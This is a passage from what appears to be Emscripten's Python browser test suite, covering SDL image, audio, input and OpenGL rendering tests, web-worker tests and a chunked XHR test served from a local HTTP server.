assert os.path.exists(os.path.join(self.get_dir(), 'page.data.compress')), 'must be data file in compressed form'
assert os.stat(os.path.join(self.get_dir(), 'page.js')).st_size != os.stat(os.path.join(self.get_dir(), 'page.js.compress')).st_size, 'compressed file must be different'
shutil.move(os.path.join(self.get_dir(), 'datafile.txt'), 'datafile.txt.renamedsoitcannotbefound');
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
open(os.path.join(self.get_dir(), 'sdl_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
for mem in [0, 1]:
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image.c'), '-O2', '--preload-file', 'screenshot.jpg', '-o', 'page.html', '--memory-init-file', str(mem)]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpeg'))
open(os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image_jpeg.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), '--preload-file', 'screenshot.jpeg', '-o', 'page.html']).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_compressed(self):
for image, width in [(path_from_root('tests', 'screenshot2.png'), 300),
(path_from_root('tests', 'screenshot.jpg'), 600)]:
self.clear()
print image
basename = os.path.basename(image)
shutil.copyfile(image, os.path.join(self.get_dir(), basename))
open(os.path.join(self.get_dir(), 'sdl_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()).replace('screenshot.jpg', basename))
self.build_native_lzma()
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image.c'), '--preload-file', basename, '-o', 'page.html',
'--compression', '%s,%s,%s' % (path_from_root('third_party', 'lzma.js', 'lzma-native'),
path_from_root('third_party', 'lzma.js', 'lzma-decoder.js'),
'LZMA.decompress')]).communicate()
shutil.move(os.path.join(self.get_dir(), basename), basename + '.renamedsoitcannotbefound');
self.run_browser('page.html', '', '/report_result?' + str(width))
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not'])
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not'])
def test_sdl_canvas(self):
open(os.path.join(self.get_dir(), 'sdl_canvas.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_canvas.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_canvas.c'), '-o', 'page.html']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_key(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_key.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_key.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''']).communicate()
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_text(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(charCode) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, charCode);
document.body.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_text.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js']).communicate()
self.run_browser('page.html', '', '/report_result?740')
def test_sdl_mouse_offsets(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = 99999; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js']).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_audio(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'alarmvictory_1.ogg'), os.path.join(self.get_dir(), 'sound.ogg'))
shutil.copyfile(path_from_root('tests', 'sounds', 'alarmcreatemiltaryfoot_1.wav'), os.path.join(self.get_dir(), 'sound2.wav'))
open(os.path.join(self.get_dir(), 'bad.ogg'), 'w').write('I claim to be audio, but am lying')
open(os.path.join(self.get_dir(), 'sdl_audio.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_audio.c')).read()))
# use closure to check for a possible bug with closure minifying away newer Audio() attributes
Popen([PYTHON, EMCC, '-O2', '--closure', '1', '--minify', '0', os.path.join(self.get_dir(), 'sdl_audio.c'), '--preload-file', 'sound.ogg', '--preload-file', 'sound2.wav', '--preload-file', 'bad.ogg', '-o', 'page.html', '-s', 'EXPORTED_FUNCTIONS=["_main", "_play", "_play2"]']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_audio_mix_channels(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'noise.ogg'), os.path.join(self.get_dir(), 'sound.ogg'))
open(os.path.join(self.get_dir(), 'sdl_audio_mix_channels.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_audio_mix_channels.c')).read()))
Popen([PYTHON, EMCC, '-O2', '--minify', '0', os.path.join(self.get_dir(), 'sdl_audio_mix_channels.c'), '--preload-file', 'sound.ogg', '-o', 'page.html']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_audio_mix(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'pluck.ogg'), os.path.join(self.get_dir(), 'sound.ogg'))
shutil.copyfile(path_from_root('tests', 'sounds', 'the_entertainer.ogg'), os.path.join(self.get_dir(), 'music.ogg'))
shutil.copyfile(path_from_root('tests', 'sounds', 'noise.ogg'), os.path.join(self.get_dir(), 'noise.ogg'))
open(os.path.join(self.get_dir(), 'sdl_audio_mix.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_audio_mix.c')).read()))
Popen([PYTHON, EMCC, '-O2', '--minify', '0', os.path.join(self.get_dir(), 'sdl_audio_mix.c'), '--preload-file', 'sound.ogg', '--preload-file', 'music.ogg', '--preload-file', 'noise.ogg', '-o', 'page.html']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_audio_quickload(self):
open(os.path.join(self.get_dir(), 'sdl_audio_quickload.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_audio_quickload.c')).read()))
Popen([PYTHON, EMCC, '-O2', '--minify', '0', os.path.join(self.get_dir(), 'sdl_audio_quickload.c'), '-o', 'page.html', '-s', 'EXPORTED_FUNCTIONS=["_main", "_play"]']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
open(os.path.join(self.get_dir(), 'sdl_gl_read.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_gl_read.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_gl_read.c'), '-o', 'something.html']).communicate()
self.run_browser('something.html', '.', '/report_result?1')
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png'],
message='You should see an image with gray at the top.')
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png',
args=['--minify', '0', '--preload-file', 'screenshot.png'],
message='You should see an image with gray at the top.')
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png',
args=['--preload-file', 'screenshot.png'],
message='You should see an image with gray at the top.')
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png'],
message='You should see an image with fog.')
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png'],
message='You should see an image with fog.')
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png'],
message='You should see an image with fog.')
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png'],
message='You should see an image with fog.')
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png',
args=['--preload-file', 'screenshot.png'],
message='You should see an image with fog.')
def test_openal_playback(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'audio.wav'), os.path.join(self.get_dir(), 'audio.wav'))
open(os.path.join(self.get_dir(), 'openal_playback.cpp'), 'w').write(self.with_report_result(open(path_from_root('tests', 'openal_playback.cpp')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'openal_playback.cpp'), '--preload-file', 'audio.wav', '-o', 'page.html']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_glfw(self):
open(os.path.join(self.get_dir(), 'glfw.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'glfw.c')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'glfw.c'), '-o', 'page.html']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_egl_width_height(self):
open(os.path.join(self.get_dir(), 'test_egl_width_height.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl_width_height.c')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl_width_height.c'), '-o', 'page.html']).communicate()
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_freealut(self):
programs = self.get_library('freealut', os.path.join('examples', 'hello_world.bc'), make_args=['EXEEXT=.bc'])
for program in programs:
Popen([PYTHON, EMCC, '-O2', program, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should hear "Hello World!"')
def test_worker(self):
# Test running in a web worker
output = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'], stdout=PIPE, stderr=PIPE).communicate()
assert len(output[0]) == 0, output[0]
assert os.path.exists('worker.js'), output
self.assertContained('you should not see this text when in a worker!', run_js('worker.js')) # code should run standalone
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''')
html_file.close()
self.run_browser('main.html', 'You should see that the worker was called, and said "hello from worker!"', '/report_result?hello%20from%20worker!')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""")
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["stderr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
Popen([PYTHON, EMCC, path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_CHUNKS=1', '-o', worker_filename,
'--pre-js', prejs_filename]).communicate()
chunkSize = 1024
data = os.urandom(10*chunkSize+1) # 10 full chunks and one 1 byte chunk
expectedConns = 11
import zlib
checksum = zlib.adler32(data)
def chunked_server(support_byte_ranges):
class ChunkedServerHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:8888")
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
(start, end) = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data)-1, end)
length = end-start+1
s.sendheaders([],length)
s.wfile.write(data[start:end+1])
s.wfile.close()
httpd = BaseHTTPServer.HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns+1):
httpd.handle_request()
server = multiprocessing.Process(target=chunked_server, args=(True,))
server.start()
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
server.terminate()
def test_glgears(self):
self.btest('hello_world_gles.c', reference='gears.png',
args=['-DHAVE_BUILTIN_SINCOS'], outfile='something.html',
message='You should see animating gears.')
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
for emulation in [0, 1]:
if full_es2 and emulation: continue
print full_es2, emulation
Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FORCE_GL_EMULATION=1'] if emulation else []) +
(['-s', 'FULL_ES2=1'] if full_es2 else []),
).communicate()
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
assert ('var GLEmulation' in open(self.in_dir('something.html')).read()) == emulation, "emulation code should be added when asked for"
def test_fulles2_sdlproc(self):
self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1'])
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png',
args=['-DHAVE_BUILTIN_SINCOS'], outfile='something.html',
message='You should see animating gears.')
with open('something.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
def test_glbook(self):
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.bc'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.bc'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.bc'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.bc'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.bc'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.bc'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.bc'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print program
basename = os.path.basename(program)
args = []
if basename == 'CH10_MultiTexture.bc':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), os.path.join(self.get_dir(), 'basemap.tga'))
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), os.path.join(self.get_dir(), 'lightmap.tga'))
args = ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.bc':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), os.path.join(self.get_dir(), 'smoke.tga'))
args = ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.bc', '.png')), args=args)
def btest(self, filename, expected=None, reference=None, reference_slack=0,
args=[], outfile='test.html', message='.'): # TODO: use in all other tests
filepath = path_from_root('tests', filename)
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filename))
if not reference:
if '\n' in filename: # if we are provided the source and not a path, use that
src = filename
filename = 'main.cpp'
else:
with open(filepath) as f: src = f.read()
with open(temp_filepath, 'w') as f: f.write(self.with_report_result(src))
else:
expected = [str(i) for i in range(0, reference_slack+1)]
shutil.copyfile(filepath, temp_filepath)
self.reftest(path_from_root('tests', reference))
args = args + ['--pre-js', 'reftest.js', '-s', 'GL_TESTING=1']
Popen([PYTHON, EMCC, temp_filepath, '-o', outfile] + args).communicate()
if type(expected) is str: expected = [expected]
self.run_browser(outfile, message, ['/report_result?' + e for e in expected])
def test_gles2_emulation(self):
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), self.in_dir('basemap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), self.in_dir('lightmap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), self.in_dir('smoke.tga'))
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
#(os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
#(os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print source
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-s', 'FULL_ES2=1',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']'''])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png')) # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1')
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1')
def test_sdl_resize(self):
self.btest('sdl_resize.c', '1')
def test_gc(self):
self.btest('browser_gc.cpp', '1')
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1')
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1'])
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png'])
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png'])
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png'])
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0'])
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0'])
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840'])
def test_cubegeom_pre(self):
self.btest('cubegeom_pre.c', expected=['-1472804742', '-1626058463', '-2046234971'])
def test_cubegeom_pre2(self):
self.btest('cubegeom_pre2.c', expected=['-1472804742', '-1626058463', '-2046234971'], args=['-s', 'GL_DEBUG=1']) # some coverage for GL_DEBUG not breaking the build
def test_cubegeom_pre3(self):
self.btest('cubegeom_pre3.c', expected=['-1472804742', '-1626058463', '-2046234971'])
def test_cubegeom(self):
self.btest('cubegeom.c', args=['-O2', '-g'], expected=['188641320', '1522377227', '-1054007155', '-1111866053'])
def test_cubegeom_glew(self):
self.btest('cubegeom_glew.c', args=['-O2', '--closure', '1'], expected=['188641320', '1522377227', '-1054007155', '-1111866053'])
def test_cubegeom_color(self):
self.btest('cubegeom_color.c', expected=['588472350', '-687660609', '-818120875'])
def test_cubegeom_normal(self):
self.btest('cubegeom_normal.c', expected=['752917084', '-251570256', '-291655550'])
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest('cubegeom_normal_dap.c', expected=['752917084', '-251570256', '-291655550'])
def test_cubegeom_normal_dap_far(self): # indices do nto start from 0
self.btest('cubegeom_normal_dap_far.c', expected=['752917084', '-251570256', '-291655550'])
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest('cubegeom_normal_dap_far_range.c', expected=['752917084', '-251570256', '-291655550'])
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest('cubegeom_normal_dap_far_glda.c', expected=['-218745386', '-263951846', '-375182658'])
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest('cubegeom_normal_dap_far_glda_quad.c', expected=['1757386625', '-677777235', '-690699597'])
def test_cubegeom_mt(self):
self.btest('cubegeom_mt.c', expected=['-457159152', '910983047', '870576921']) # multitexture
def test_cubegeom_color2(self):
self.btest('cubegeom_color2.c', expected=['1121999515', '-391668088', '-522128354'])
def test_cubegeom_texturematrix(self):
self.btest('cubegeom_texturematrix.c', expected=['1297500583', '-791216738', '-783804685'])
def test_cubegeom_fog(self):
self.btest('cubegeom_fog.c', expected=['1617140399', '-898782526', '-946179526'])
def test_cubegeom_pre_vao(self):
self.btest('cubegeom_pre_vao.c', expected=['-1472804742', '-1626058463', '-2046234971'])
def test_cubegeom_pre2_vao(self):
self.btest('cubegeom_pre2_vao.c', expected=['-1472804742', '-1626058463', '-2046234971'])
def test_cubegeom_pre2_vao2(self):
self.btest('cubegeom_pre2_vao2.c', expected=['-790445118'])
def test_cube_explosion(self):
self.btest('cube_explosion.c', expected=['667220544', '-1543354600', '-1485258415'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', reference='sdl_canvas_twice.png')
def test_sdl_maprgba(self):
